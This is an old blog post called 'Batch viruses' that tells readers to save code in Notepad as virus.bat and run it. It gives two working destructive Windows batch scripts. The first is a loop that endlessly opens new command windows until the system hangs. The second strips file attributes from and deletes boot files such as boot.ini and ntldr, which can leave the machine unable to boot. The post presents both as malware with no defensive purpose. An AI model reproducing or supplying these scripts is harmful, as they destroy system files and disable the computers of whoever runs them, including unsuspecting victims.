Search This Blog

Monday, May 2, 2011

Batch viruses


Batch viruses are the simple codes which are written into a batch file executing which hangs your system..........


simply open your notepad..
copy the following code to the file..
save the file as virus.bat under all files tab..

execute the file on your on risk..



CODE :

@echo off
:1
start
goto 1



AND THE FOLLOWING CODE CAN CRASH YOUR SYSTEM - BWARE :


@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini 

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo

0 comments:

Post a Comment